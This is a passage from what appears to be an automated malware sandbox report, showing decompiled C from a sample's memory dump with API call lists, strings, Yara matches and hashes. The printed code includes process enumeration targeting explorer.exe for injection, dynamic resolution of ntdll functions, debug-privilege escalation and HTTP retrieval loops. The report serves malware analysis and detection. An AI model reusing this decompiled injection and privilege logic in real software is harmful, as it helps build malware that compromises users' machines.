						}
						__eflags = _v3080;
						if(_v3080 != 0) {
							_t82 = _t85 + 0xc4;
							E004017E0(_t85 + 0xc4,  &_v3080);
							_t89 = _t89 + 8;
							__eflags = _v1784;
							if(_v1784 != 0) {
								__eflags =  *0x5d1c28;
								if( *0x5d1c28 != 0) {
									_t62 = E00401740("d572da9202196121d952231f26d65d07",  &_v1784);
									_t89 = _t89 + 8;
									__eflags = _t62;
									if(_t62 != 0) {
										_t23 =  &_a20; // 0x404a7a
										E004076A0(_t79, _t80, _t82, _a16,  *_t23,  &_v1784);
										_t89 = _t89 + 0x10;
									}
								}
							}
						}
						__eflags = _v2568;
						if(_v2568 != 0) {
							E004017E0(_t85 + 0x2c4,  &_v2568);
							_t89 = _t89 + 8;
						}
						 *((intOrPtr*)(_t85 + 0xc0)) = _v3084;
						 *((intOrPtr*)(_t85 + 0x4c4)) = _v2056;
						 *((intOrPtr*)(_t85 + 0x5c8)) = _v1796;
						 *((intOrPtr*)(_t85 + 0x5d0)) = _v1788;
						_t52 = _v1792;
						 *((intOrPtr*)(_t85 + 0x5cc)) = _t52;
						__eflags = _t52;
						if(_t52 != 0) {
							E004017E0(_t85 + 0x4c8, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
						}
						return 1;
					} else {
						E00401510();
						goto L7;
					}
				} else {
					Sleep(0x2710);
					_t84 = E00404B00(_t79, _t80, _t94, _t81);
					_t87 = _t87 + 4;
					if(_t84 != 0) {
						goto L5;
					} else {
						_t76 = E004017B0("FALSE", "FALSE");
						_t92 = _t87 + 8;
						_t96 = _t76;
						if(_t76 == 0) {
							L7:
							return 0;
						} else {
							_t83 = _a8;
							_t84 = E00404B00(_t79, _t80, _t96, _a8);
							_t87 = _t92 + 4;
							_t97 = _t84;
							if(_t84 != 0) {
								goto L5;
							} else {
								Sleep(0x2710);
								_t84 = E00404B00(_t79, _t80, _t97, _t83);
								_t87 = _t87 + 4;
								if(_t84 == 0) {
									goto L7;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}































                                                                                                        0x00404de0
                                                                                                        0x00404de0
                                                                                                        0x00404de0
                                                                                                        0x00404df9
                                                                                                        0x00404dfe
                                                                                                        0x00404e03
                                                                                                        0x00404e06
                                                                                                        0x00404e0c
                                                                                                        0x00404e11
                                                                                                        0x00404e17
                                                                                                        0x00404e1d
                                                                                                        0x00404e23
                                                                                                        0x00404e28
                                                                                                        0x00404e2a
                                                                                                        0x00404e2d
                                                                                                        0x00404e2f
                                                                                                        0x00404e8d
                                                                                                        0x00404e9a
                                                                                                        0x00404e9f
                                                                                                        0x00404ea2
                                                                                                        0x00404ea5
                                                                                                        0x00404eb7
                                                                                                        0x00404ebc
                                                                                                        0x00404ebf
                                                                                                        0x00404ec2
                                                                                                        0x00404ec9
                                                                                                        0x00404ed9
                                                                                                        0x00404ede
                                                                                                        0x00404ede
                                                                                                        0x00404ee1
                                                                                                        0x00404ee8
                                                                                                        0x00404ef2
                                                                                                        0x00404ef7
                                                                                                        0x00404ef7
                                                                                                        0x00404efa
                                                                                                        0x00404f01
                                                                                                        0x00404f11
                                                                                                        0x00404f16
                                                                                                        0x00404f16
                                                                                                        0x00404f19
                                                                                                        0x00404f20
                                                                                                        0x00404f29
                                                                                                        0x00404f30
                                                                                                        0x00404f35
                                                                                                        0x00404f38
                                                                                                        0x00404f3f
                                                                                                        0x00404f41
                                                                                                        0x00404f48
                                                                                                        0x00404f56
                                                                                                        0x00404f5b
                                                                                                        0x00404f5e
                                                                                                        0x00404f60
                                                                                                        0x00404f69
                                                                                                        0x00404f70
                                                                                                        0x00404f75
                                                                                                        0x00404f75
                                                                                                        0x00404f60
                                                                                                        0x00404f48
                                                                                                        0x00404f3f
                                                                                                        0x00404f78
                                                                                                        0x00404f7f
                                                                                                        0x00404f8f
                                                                                                        0x00404f94
                                                                                                        0x00404f94
                                                                                                        0x00404f9d
                                                                                                        0x00404fa9
                                                                                                        0x00404fb5
                                                                                                        0x00404fc1
                                                                                                        0x00404fc7
                                                                                                        0x00404fcd
                                                                                                        0x00404fd3
                                                                                                        0x00404fd5
                                                                                                        0x00404fe3
                                                                                                        0x00404fe8
                                                                                                        0x00404ff5
                                                                                                        0x00404ea7
                                                                                                        0x00404ea7
                                                                                                        0x00000000
                                                                                                        0x00404eac
                                                                                                        0x00404e31
                                                                                                        0x00404e36
                                                                                                        0x00404e42
                                                                                                        0x00404e44
                                                                                                        0x00404e49
                                                                                                        0x00000000
                                                                                                        0x00404e4b
                                                                                                        0x00404e55
                                                                                                        0x00404e5a
                                                                                                        0x00404e5d
                                                                                                        0x00404e5f
                                                                                                        0x00404eb0
                                                                                                        0x00404eb6
                                                                                                        0x00404e61
                                                                                                        0x00404e61
                                                                                                        0x00404e6a
                                                                                                        0x00404e6c
                                                                                                        0x00404e6f
                                                                                                        0x00404e71
                                                                                                        0x00000000
                                                                                                        0x00404e73
                                                                                                        0x00404e78
                                                                                                        0x00404e84
                                                                                                        0x00404e86
                                                                                                        0x00404e8b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00404e8b
                                                                                                        0x00404e71
                                                                                                        0x00404e5f
                                                                                                        0x00404e49

                                                                                                        APIs
                                                                                                          • Part of subcall function 00404B00: InternetCrackUrlA.WININET(7519EA30,00000000,?), ref: 00404B57
                                                                                                        • Sleep.KERNEL32(00002710,?,?,7519EA30,00000000), ref: 00404E36
                                                                                                          • Part of subcall function 00404B00: InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00404B9D
                                                                                                          • Part of subcall function 00404B00: InternetConnectA.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BCB
                                                                                                          • Part of subcall function 00404B00: InternetCloseHandle.WININET(00000000), ref: 00404BE5
                                                                                                        • Sleep.KERNEL32(00002710,?,?,?,?,?,?,7519EA30,00000000), ref: 00404E78
                                                                                                          • Part of subcall function 00404B00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,0040A200,846CF300,00000000), ref: 00404C52
                                                                                                          • Part of subcall function 00404B00: InternetQueryOptionA.WININET(00000000,0000001F,7519EA30,00000000), ref: 00404C8C
                                                                                                          • Part of subcall function 00404B00: InternetSetOptionA.WININET(00000000,0000001F,00000180,00000004), ref: 00404CAA
                                                                                                          • Part of subcall function 00404B00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404CC1
                                                                                                          • Part of subcall function 00404B00: InternetReadFile.WININET(00000CC8,00000000,00000400,00000000), ref: 00404CF3
                                                                                                          • Part of subcall function 00404B00: InternetCloseHandle.WININET(00000CC8), ref: 00404D9A
                                                                                                          • Part of subcall function 00404B00: InternetCloseHandle.WININET(00000000), ref: 00404D9F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandle$HttpOpenOptionRequestSleep$ConnectCrackFileQueryReadSend
                                                                                                        • String ID: FALSE$FALSE$d06ed635-68f6-4e9a-955c-4899f5f57b9a$d572da9202196121d952231f26d65d07$zJ@
                                                                                                        • API String ID: 581717041-2028580964
                                                                                                        • Opcode ID: f6e244a9823f2d47c510c447beec4e774f5ae107e04512a416141b7e5e042319
                                                                                                        • Instruction ID: 78b4ba5b10ac8112f2c62d6eddd8c7677888aa5bfa1098f5850d3e15ab47de6f
                                                                                                        • Opcode Fuzzy Hash: f6e244a9823f2d47c510c447beec4e774f5ae107e04512a416141b7e5e042319
                                                                                                        • Instruction Fuzzy Hash: 9351C5B1D012155BEB21EB64DC41FDB77E86B44344F0405BBE90CB32C1EB38AA94CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408450, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100sleepthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E00408450(char* __ecx, void* __eflags) {
				char _v8;
				char _v1032;
				char _v1036;
				long _v1040;
				char _v5136;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t24;
				intOrPtr _t27;
				void* _t29;
				intOrPtr _t30;
				void* _t34;
				void* _t35;
				intOrPtr _t39;
				signed int _t41;
				void* _t43;
				void* _t44;
				void* _t46;
				void* _t47;

				_t37 = __ecx;
				E00401BB0( &_v5136, 0, 0x1000);
				E00401BB0( &_v1036, 0, 0x404);
				E00401670( &_v1036, 0, 0x404);
				_v1036 = GetCurrentProcessId();
				E00401A00( &_v1032, "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe");
				_t46 = _t44 + 0x2c;
				_push(_t35);
				_push(_t41);
				_push(_t39);
				L1:
				while(1) {
					if( *0x5d1314 == 0) {
						_t24 = E00407EF0("explorer.exe");
						_t47 = _t46 + 4;
						if(_t24 != 0) {
							_t37 =  &_v1036;
							E004029E0( &_v1036, 0x400000, _t24,  &_v1036, 0x404,  &_v8, E00408390);
							_t46 = _t47 + 0x18;
							goto L12;
						}
					} else {
						_v1040 = 0;
						_t29 = E004080E0(_t35, _t39, _t41, 1,  &_v5136, 0x1000); // executed
						_t35 = _t29;
						_t46 = _t46 + 0xc;
						if(_t35 != 0) {
							_t41 = 0;
							if(_t35 != 0) {
								while(1) {
									_t30 =  *0x5d2118; // 0x0
									if(_t30 != 0) {
										goto L12;
									}
									_t39 =  *((intOrPtr*)(_t43 + _t41 * 4 - 0x140c));
									if(_t39 == 0 || _t39 == GetCurrentProcessId()) {
										L8:
										_t41 = _t41 + 1;
										if(_t41 < _t35) {
											continue;
										} else {
										}
									} else {
										_t34 = E004029E0(_t37, 0x400000, _t39,  &_v1036, 0x404,  &_v8, E00408390); // executed
										_t46 = _t46 + 0x18;
										if(_t34 == 0) {
											goto L8;
										}
									}
									goto L12;
								}
							}
							L12:
							_t27 =  *0x5d2118; // 0x0
							if(_t27 != 0) {
								ExitThread(0);
							}
							Sleep(0x1f4);
							continue;
						}
					}
					return 0;
				}
			}























                                                                                                        0x00408450
                                                                                                        0x00408467
                                                                                                        0x0040847a
                                                                                                        0x0040848d
                                                                                                        0x0040849b
                                                                                                        0x004084ad
                                                                                                        0x004084b2
                                                                                                        0x004084b5
                                                                                                        0x004084b6
                                                                                                        0x004084b7
                                                                                                        0x00000000
                                                                                                        0x004084c0
                                                                                                        0x004084c7
                                                                                                        0x00408552
                                                                                                        0x00408557
                                                                                                        0x0040855c
                                                                                                        0x0040856c
                                                                                                        0x00408579
                                                                                                        0x0040857e
                                                                                                        0x00000000
                                                                                                        0x0040857e
                                                                                                        0x004084cd
                                                                                                        0x004084d8
                                                                                                        0x004084e5
                                                                                                        0x004084ea
                                                                                                        0x004084ec
                                                                                                        0x004084f1
                                                                                                        0x004084f7
                                                                                                        0x004084fb
                                                                                                        0x00408501
                                                                                                        0x00408501
                                                                                                        0x00408508
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040850a
                                                                                                        0x00408513
                                                                                                        0x00408546
                                                                                                        0x00408546
                                                                                                        0x00408549
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040854b
                                                                                                        0x0040851f
                                                                                                        0x0040853a
                                                                                                        0x0040853f
                                                                                                        0x00408544
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00408544
                                                                                                        0x00000000
                                                                                                        0x00408513
                                                                                                        0x00408501
                                                                                                        0x00408581
                                                                                                        0x00408581
                                                                                                        0x00408588
                                                                                                        0x0040859c
                                                                                                        0x0040859c
                                                                                                        0x0040858f
                                                                                                        0x00000000
                                                                                                        0x0040858f
                                                                                                        0x004084f1
                                                                                                        0x004085aa
                                                                                                        0x004085aa

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe, xrefs: 004084A7
                                                                                                        • explorer.exe, xrefs: 0040854D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentProcess$ExitSleepThread
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe$explorer.exe
                                                                                                        • API String ID: 970816010-4120632074
                                                                                                        • Opcode ID: 23dac3867fb613243539c5080df6174ce124e5fc0d0057c529f6c3144e09810b
                                                                                                        • Instruction ID: 85ffc2236a6c84dd18c35f3841ea3bb67a2469adcd3a8cb5e8b5d398127c98f4
                                                                                                        • Opcode Fuzzy Hash: 23dac3867fb613243539c5080df6174ce124e5fc0d0057c529f6c3144e09810b
                                                                                                        • Instruction Fuzzy Hash: 02310DF5A40204B6EB10AB919E46FE7336C5714745F0400BFBF44B21D2EEB85E4986BD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407EF0, Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00407EF0(intOrPtr _a4) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				void* _t9;
				void* _t13;
				int _t17;
				void* _t21;
				void* _t29;
				void* _t30;
				void* _t31;

				_v300 = 0x128;
				_t9 = CreateToolhelp32Snapshot(2, 0); // executed
				_t29 = _t9;
				if(_t29 != 0xffffffff) {
					Process32First(_t29,  &_v300); // executed
					_t26 = _a4;
					_t13 = E00401740(_a4,  &_v264);
					_t31 = _t30 + 8;
					if(_t13 == 0) {
						L7:
						CloseHandle(_t29);
						return _v292;
					} else {
						_t17 = Process32Next(_t29,  &_v300); // executed
						if(_t17 == 0) {
							L6:
							FindCloseChangeNotification(_t29); // executed
							return 0;
						} else {
							while(1) {
								_t21 = E00401740(_t26,  &_v264);
								_t31 = _t31 + 8;
								if(_t21 == 0) {
									goto L7;
								}
								if(Process32Next(_t29,  &_v300) != 0) {
									continue;
								} else {
									goto L6;
								}
								goto L8;
							}
							goto L7;
						}
					}
				} else {
					return 0;
				}
				L8:
			}













                                                                                                        0x00407efe
                                                                                                        0x00407f08
                                                                                                        0x00407f0d
                                                                                                        0x00407f12
                                                                                                        0x00407f24
                                                                                                        0x00407f29
                                                                                                        0x00407f34
                                                                                                        0x00407f39
                                                                                                        0x00407f3e
                                                                                                        0x00407f85
                                                                                                        0x00407f86
                                                                                                        0x00407f97
                                                                                                        0x00407f40
                                                                                                        0x00407f48
                                                                                                        0x00407f4f
                                                                                                        0x00407f76
                                                                                                        0x00407f77
                                                                                                        0x00407f84
                                                                                                        0x00407f51
                                                                                                        0x00407f51
                                                                                                        0x00407f59
                                                                                                        0x00407f5e
                                                                                                        0x00407f63
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00407f74
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00407f74
                                                                                                        0x00000000
                                                                                                        0x00407f51
                                                                                                        0x00407f4f
                                                                                                        0x00407f14
                                                                                                        0x00407f1a
                                                                                                        0x00407f1a
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407F08
                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00407F24
                                                                                                        • Process32Next.KERNEL32 ref: 00407F48
                                                                                                        • Process32Next.KERNEL32 ref: 00407F6D
                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000128,00000001,?), ref: 00407F77
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$Next$ChangeCloseCreateFindFirstNotificationSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 4072508860-0
                                                                                                        • Opcode ID: e4ca192297ae2abfc18c74d4c2ed59ead4e19fef381fd0585f9fea2239c3ba31
                                                                                                        • Instruction ID: 2d56b8353110eab1b9b04cc9459ef1c3f068b5f37dea811fb5169f2e54792dba
                                                                                                        • Opcode Fuzzy Hash: e4ca192297ae2abfc18c74d4c2ed59ead4e19fef381fd0585f9fea2239c3ba31
                                                                                                        • Instruction Fuzzy Hash: CA11293190102967DB20A625AD41EEB73ACDF48325F0002BBFD48E21C1EB38DE5186AA
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004021A0, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 99memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E004021A0(void* __ecx, signed int __edx, char _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				signed int _v16;
				void* _v20;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				signed int _t22;
				void* _t24;
				short _t27;
				void* _t31;
				signed int _t37;
				signed int _t38;
				void _t40;
				signed int _t46;
				void* _t52;
				intOrPtr _t57;
				void* _t61;
				void* _t62;

				_t46 = __edx;
				_t22 =  *0x5d1128; // 0x9b85ff60
				_t62 = _t61 - 0x28;
				_t64 = _t22 |  *0x5d112c;
				if((_t22 |  *0x5d112c) != 0) {
					L3:
					_t24 = VirtualAlloc(0, 0x120, 0x3000, 4); // executed
					_t52 = _t24;
					__eflags = _t52;
					if(_t52 != 0) {
						_t2 = _t52 + 0x18; // 0x18
						_t57 = _t2;
						E004017E0(_t57, _a12);
						asm("cdq");
						 *((intOrPtr*)(_t52 + 0x10)) = _t57;
						 *(_t52 + 0x14) = _t46;
						_t27 = E00401850(_t57);
						asm("xorps xmm0, xmm0");
						 *((short*)(_t52 + 8)) = _t27;
						 *((short*)(_t52 + 0xa)) = _t27;
						_t8 = _t52 + 8; // 0x8
						 *_t52 = 0;
						 *(_t52 + 4) = 0;
						asm("cdq");
						_v36 = _t8;
						_v32 = _t46;
						asm("cdq");
						_v20 = _t52;
						_v44 = _a4;
						_v40 = _a8;
						asm("movlpd [ebp-0x18], xmm0");
						_v16 = _t46;
						_t31 = E00401D10( *0x5d1128,  *0x5d112c,  &_v44, 4);
						_t40 =  *_t52;
						_v8 = 0;
						_v8 =  *(_t52 + 4);
						VirtualFree(_t52, 0, 0x8000); // executed
						__eflags = _t31;
						if(_t31 < 0) {
							__eflags = 0;
							return 0;
						} else {
							return _t40;
						}
					} else {
						__eflags = 0;
						return _t24;
					}
				} else {
					_t37 = E004022B0(_t46, E00401E50(__ecx, __edx, _t64, "ntdll.dll"), _t46, "LdrGetProcedureAddress");
					_t62 = _t62 + 0x10;
					 *0x5d1128 = _t37;
					_t38 = _t37 | _t46;
					 *0x5d112c = _t46;
					if(_t38 != 0) {
						goto L3;
					} else {
						return _t38;
					}
				}
			}






















                                                                                                        0x004021a0
                                                                                                        0x004021a3
                                                                                                        0x004021a8
                                                                                                        0x004021ab
                                                                                                        0x004021b1
                                                                                                        0x004021e1
                                                                                                        0x004021f0
                                                                                                        0x004021f6
                                                                                                        0x004021f8
                                                                                                        0x004021fa
                                                                                                        0x00402208
                                                                                                        0x00402208
                                                                                                        0x0040220c
                                                                                                        0x00402213
                                                                                                        0x00402215
                                                                                                        0x00402218
                                                                                                        0x0040221b
                                                                                                        0x00402223
                                                                                                        0x00402226
                                                                                                        0x0040222a
                                                                                                        0x0040222e
                                                                                                        0x00402231
                                                                                                        0x00402237
                                                                                                        0x0040223e
                                                                                                        0x0040223f
                                                                                                        0x00402244
                                                                                                        0x00402247
                                                                                                        0x00402248
                                                                                                        0x00402257
                                                                                                        0x00402263
                                                                                                        0x00402266
                                                                                                        0x0040226b
                                                                                                        0x0040226e
                                                                                                        0x00402273
                                                                                                        0x0040227a
                                                                                                        0x00402284
                                                                                                        0x0040228f
                                                                                                        0x00402295
                                                                                                        0x00402297
                                                                                                        0x004022a9
                                                                                                        0x004022af
                                                                                                        0x00402299
                                                                                                        0x004022a4
                                                                                                        0x004022a4
                                                                                                        0x004021fc
                                                                                                        0x004021fc
                                                                                                        0x00402202
                                                                                                        0x00402202
                                                                                                        0x004021b3
                                                                                                        0x004021c4
                                                                                                        0x004021c9
                                                                                                        0x004021cc
                                                                                                        0x004021d1
                                                                                                        0x004021d3
                                                                                                        0x004021d9
                                                                                                        0x00000000
                                                                                                        0x004021db
                                                                                                        0x004021e0
                                                                                                        0x004021e0
                                                                                                        0x004021d9

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000120,00003000,00000004,?,?,?,?,?,00406208,?,?,NtGetContextThread,?,?,?), ref: 004021F0
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00406208,?), ref: 0040228F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocFree
                                                                                                        • String ID: LdrGetProcedureAddress$ntdll.dll
                                                                                                        • API String ID: 2087232378-1174695804
                                                                                                        • Opcode ID: c33a02798e6a53002745d0f77be891a07d66ca9fe96947442056161f0f134ff1
                                                                                                        • Instruction ID: 0eb8dc9d9b9cb1f38aa61a5e869cd7518be7929c4289078d347e1877a8125501
                                                                                                        • Opcode Fuzzy Hash: c33a02798e6a53002745d0f77be891a07d66ca9fe96947442056161f0f134ff1
                                                                                                        • Instruction Fuzzy Hash: EE31A675E01605ABD710DFA5DC4179AF7B5FF88314F10816BFA08A7290D774A910DBD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403050, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 36sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 83%
                                                                                                        			E00403050(void* __ebx, void* __ecx, intOrPtr _a4, char _a8) {
				char _v8;
				void* _t8;
				void* _t11;
				void* _t22;
				void* _t23;

				_t15 = __ecx;
				_push(__ecx);
				_t20 = _a4;
				_t3 =  &_a8; // 0x4049e6
				_t17 =  *_t3;
				_v8 = 0;
				_t8 = E00402930(__ebx, __ecx, _a4,  *_t3,  &_v8); // executed
				_t23 = _t22 + 0xc;
				if(_t8 == 0) {
					_push(__ebx);
					do {
						Sleep(0x2bc);
						_t11 = E00402930(Sleep, _t15, _t20, _t17,  &_v8);
						_t23 = _t23 + 0xc;
					} while (_t11 == 0);
				}
				return _v8;
			}








                                                                                                        0x00403050
                                                                                                        0x00403053
                                                                                                        0x00403055
                                                                                                        0x0040305c
                                                                                                        0x0040305c
                                                                                                        0x00403062
                                                                                                        0x00403069
                                                                                                        0x0040306e
                                                                                                        0x00403073
                                                                                                        0x00403075
                                                                                                        0x00403080
                                                                                                        0x00403085
                                                                                                        0x0040308d
                                                                                                        0x00403092
                                                                                                        0x00403095
                                                                                                        0x00403099
                                                                                                        0x004030a2

                                                                                                        APIs
                                                                                                          • Part of subcall function 00402930: RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 0040293E
                                                                                                        • Sleep.KERNEL32(000002BC,00000000,004049E6,?), ref: 00403085
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AdjustPrivilegeSleep
                                                                                                        • String ID: I@
                                                                                                        • API String ID: 2381171102-3008766272
                                                                                                        • Opcode ID: 3684f1ff27a157f2dcf05cc4e88ee31a4ec2ea1600e2fc1ac8802e8c600a36bb
                                                                                                        • Instruction ID: ed7222478eb7be61e29de2bc31fce2cbcf9e59994bb1285db2a9842840863ed2
                                                                                                        • Opcode Fuzzy Hash: 3684f1ff27a157f2dcf05cc4e88ee31a4ec2ea1600e2fc1ac8802e8c600a36bb
                                                                                                        • Instruction Fuzzy Hash: B1F05476501118BBDB109A86DD45E9BB7ACEB4A315F140066FD08E3142E2709F0486B5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402930, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 68%
                                                                                                        			E00402930(void* __ebx, char* __ecx, intOrPtr _a4, intOrPtr* _a12) {
				char _v5;
				intOrPtr _t10;
				intOrPtr _t12;
				void* _t13;
				struct HINSTANCE__* _t17;

				_t14 = __ecx;
				_t13 = __ebx;
				_push(__ecx);
				RtlAdjustPrivilege(0x14, 1, 0,  &_v5); // executed
				if( *0x5d1314 == 0) {
					__eflags =  *0x5d1bb8;
					_push(_a4);
					if(__eflags == 0) {
						goto L4;
					} else {
						_t10 = E00405420(_t14, _t17, __eflags);
					}
					goto L5;
				} else {
					if( *0x5d1bb8 != 0) {
						__eflags =  *0x5d1318;
						if(__eflags == 0) {
							goto L9;
						} else {
							_t12 = E00405420(_t14, _t17, __eflags, _a4);
						}
						goto L10;
					} else {
						_t24 =  *0x5d1318;
						if( *0x5d1318 == 0) {
							L9:
							_push(_a4);
							_push(0xdd400);
							_push(0x4f3c38); // executed
							_t12 = E00405E60(_t14, _t17, __eflags); // executed
							L10:
							 *_a12 = _t12;
							__eflags = _t12;
							if(_t12 != 0) {
								goto L14;
							} else {
								 *0x5d1130 =  *0x5d1130 + 1;
								__eflags =  *0x5d1130;
								return _t12;
							}
						} else {
							_push(_a4);
							L4:
							_t10 = E00405B80(_t13, _t14, _t24);
							L5:
							 *_a12 = _t10;
							if(_t10 != 0) {
								L14:
								return 1;
							} else {
								return _t10;
							}
						}
					}
				}
			}








                                                                                                        0x00402930
                                                                                                        0x00402930
                                                                                                        0x00402933
                                                                                                        0x0040293e
                                                                                                        0x0040294b
                                                                                                        0x004029b5
                                                                                                        0x004029bc
                                                                                                        0x004029bf
                                                                                                        0x00000000
                                                                                                        0x004029c1
                                                                                                        0x004029c1
                                                                                                        0x004029c1
                                                                                                        0x00000000
                                                                                                        0x0040294d
                                                                                                        0x00402954
                                                                                                        0x00402977
                                                                                                        0x0040297e
                                                                                                        0x00000000
                                                                                                        0x00402980
                                                                                                        0x00402983
                                                                                                        0x00402988
                                                                                                        0x00000000
                                                                                                        0x00402956
                                                                                                        0x00402956
                                                                                                        0x0040295d
                                                                                                        0x0040298d
                                                                                                        0x0040298d
                                                                                                        0x00402990
                                                                                                        0x00402995
                                                                                                        0x0040299a
                                                                                                        0x004029a2
                                                                                                        0x004029a5
                                                                                                        0x004029a7
                                                                                                        0x004029a9
                                                                                                        0x00000000
                                                                                                        0x004029ab
                                                                                                        0x004029ab
                                                                                                        0x004029ab
                                                                                                        0x004029b4
                                                                                                        0x004029b4
                                                                                                        0x0040295f
                                                                                                        0x0040295f
                                                                                                        0x00402962
                                                                                                        0x00402962
                                                                                                        0x00402967
                                                                                                        0x0040296d
                                                                                                        0x00402971
                                                                                                        0x004029c8
                                                                                                        0x004029d0
                                                                                                        0x00402976
                                                                                                        0x00402976
                                                                                                        0x00402976
                                                                                                        0x00402971
                                                                                                        0x0040295d
                                                                                                        0x00402954

                                                                                                        APIs
                                                                                                        • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 0040293E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AdjustPrivilege
                                                                                                        • String ID:
                                                                                                        • API String ID: 3260937286-0
                                                                                                        • Opcode ID: 3c949d7a50e6a14e43b139887f2c1b8c7df2425b35e9b3bac42adbc264ed2d1d
                                                                                                        • Instruction ID: 506e94688713331cfc66463232599238f62637629a90eb22369aba3845a8fa88
                                                                                                        • Opcode Fuzzy Hash: 3c949d7a50e6a14e43b139887f2c1b8c7df2425b35e9b3bac42adbc264ed2d1d
                                                                                                        • Instruction Fuzzy Hash: 3811C8B0702609BBDB215F50ED0DBA63764E710349F10017BFD09352E0E7BA99D8DA9E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407ED0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00407ED0(WCHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesW(_a4); // executed
				if(_t3 == 0xffffffff || (_t3 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                                                        0x00407ed6
                                                                                                        0x00407edf
                                                                                                        0x00407eef
                                                                                                        0x00407ee5
                                                                                                        0x00407eeb
                                                                                                        0x00407eeb

                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: a01fb3011eea16f0657583ec84761e03cb712b6dfc41820b4ced66a2982edb9b
                                                                                                        • Instruction ID: bc5cfff1355e279673e223a49d8db9145eaba15aaeeac5c753cdea018dd9536a
